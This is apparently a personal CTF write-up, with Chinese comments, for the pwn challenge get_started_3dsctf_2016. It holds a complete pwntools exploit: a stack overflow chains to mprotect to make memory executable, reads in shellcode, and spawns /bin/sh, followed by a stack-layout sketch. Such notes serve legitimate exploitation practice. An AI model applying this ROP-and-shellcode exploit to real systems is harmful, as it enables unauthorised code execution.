get_started_3dsctf_2016

• 重点函数

mprtpoct (开始地址，生效空间，权限标记)

可以修改某一个内存段的读写执行权限

from pwn import *

context.os='linux'
context.arch='i386'

sh = process("./get_started_3dsctf_2016")
elf = ELF("./get_started_3dsctf_2016")

#sh = remote("node3.buuoj.cn",27306)
#payload = 'a'*56 + p32(0x80489B8)
mprtpoct = 0x0806EC80 
pop3 = 0x080509a5
#pop3 = 0x080a25b6 
mem_addr = 0x80EB000
mem_size = 0x2000  
mem_proc = 0x7   

payload = 'a'*56 + p32(mprtpoct)+p32(pop3)
#填充栈空间    mprtpoct 覆盖ret地

read= elf.symbols['read']

payload += p32(mem_addr) + p32(mem_size) + p32(mem_proc)

payload += p32(read)
payload += p32(mem_addr)


payload += p32(0)
payload += p32(mem_addr)
payload += p32(0x100)

payload += p32(mem_addr)

sh.sendline(payload)

#payload_sh = asm(shellcraft.sh())

#这是一个shell
shellcode = asm('''
        mov edx, 0
        mov ecx, 0
        push 0x68732f #sh小端储存
        push 0x6e69622f #bin 小端储存
        mov ebx, esp
        mov eax, 0xb
        int 0x80
''')

#payload_sh = asm(shellcraft.sh(),arch = 'i386', os = 'linux')  #这里应该是玄学问题，这个题跑不通
sh.sendline(shellcode)

sh.interactive()

---

.......

ret mprtpoct

pop3

mem_addr

mem_size

mem_porc(权限的值)

read

addr

参数1...

.....

<wiz_tmp_tag id="wiz-table-range-border" contenteditable="false" style="display: none;">

 

 

 

 

 

 

附件列表